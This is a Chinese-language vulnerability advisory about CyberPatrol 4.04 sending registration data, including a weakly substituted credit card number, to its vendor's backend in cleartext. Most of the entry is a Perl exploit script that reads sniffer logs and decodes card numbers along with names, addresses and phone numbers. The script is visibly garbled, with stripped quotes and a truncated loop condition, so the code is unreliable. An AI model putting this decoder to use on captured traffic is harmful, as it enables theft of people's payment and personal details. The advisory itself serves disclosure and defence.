CyberPatrol注册不安全漏洞
2005-08-11
系统编号:
WAVDB-00027
影响版本:
CyberPatrol 4.04.003-005
程序介绍:
CyberPatrol 是流行的 web 访问限制软件,出自 Microsys。
漏洞分析:
在从客户端向 Microsys' backend (cybercentral.microsys.com)提交登记信息的过程中,CyberPatrol 存在一个漏洞。这个漏洞使得远程攻击者可以获取私人保密信息,包括信用卡。客户端声明包括信用卡在内的所有信息在向 Microsys' backend 发送前都已经被故意搅乱。嗅探的结果表明,除了信用卡号外的所有信息实际上是以明文传送的。远程攻击者可以放一个嗅探器,获取保密的登记信息。只有信用卡号例外,它被用替换算法保护起来。另外,这些信息还可以通过检查防火墙代理的日志文件来获得。
漏洞利用:
#!/usr/bin/perl
$showline=0;
open(SNORT, log );
LINE:while($line=
@field=split /\s/, $line;
if($#field>0 && $#field<15){next LINE;}
if(!($line=~/\w/)){
$registerinfo=~s/\%20/ /g;
$registerinfo=~s/\%40/@/g;
($junk, $registerinfo)=split /\.\.\.\./, $registerinfo;
@array=split /\&/, $registerinfo;
if($array[0]=~/EMAIL/){print $array[0]\n ;}
if($array[1]=~/CARD/){print CARD= ;}
@chararray=split //, $array[1];
$arraylength=$#chararray;
for($i=0; $i<$arraylength+1; ++$i){
if($chararray[$i]=~/\%/){
$checkchar= $chararray[$i] ;
$checkchar.= $chararray[$i+1] ;
$checkchar.= $chararray[$i+2] ;
$i=$i+2;
} else {$checkchar= $chararray[$i] ;}
if($checkchar=~/z/){print 0 ;}
elsif($checkchar=~/{/){print 1 ;}
elsif($checkchar=~/x/){print 2 ;}
elsif($checkchar=~/y/){print 3 ;}
elsif($checkchar=~/\%7E/){print 4 ;}
elsif($checkchar=~/\./){print 5 ;}
elsif($checkchar=~/\|/){print 6 ;}
elsif($checkchar=~/\}/){print 7 ;}
elsif($checkchar=~/r/){print 8 ;}
elsif($checkchar=~/s/){print 9 ;}
}
if($array[2]=~/EXP/){print \n$array[2]\n ;}
if($array[3]=~/NAME/){print $array[3]\n ;}
if($array[4]=~/ADDR1/){print $array[4]\n ;}
if($array[5]=~/ADDR2/){print $array[5]\n ;}
if($array[6]=~/CITY/){print $array[6]\n ;}
if($array[7]=~/PHONE/){print $array[7]\n\n\n ;}
$registerinfo= ;
$showline=0;
}
if ($line=~/POST/) {$showline=1}
if ($showline eq 1) {
($junk, $line)=split / /, $line;
chomp($line);
$registerinfo.=$line;
}
}
解决方案:
临时解决办法:
建议您在没有打补丁或升级版本前暂停使用,换用别的替代产品
信息来源:
<* 来源:Joey Maier (maierj@home.com) *>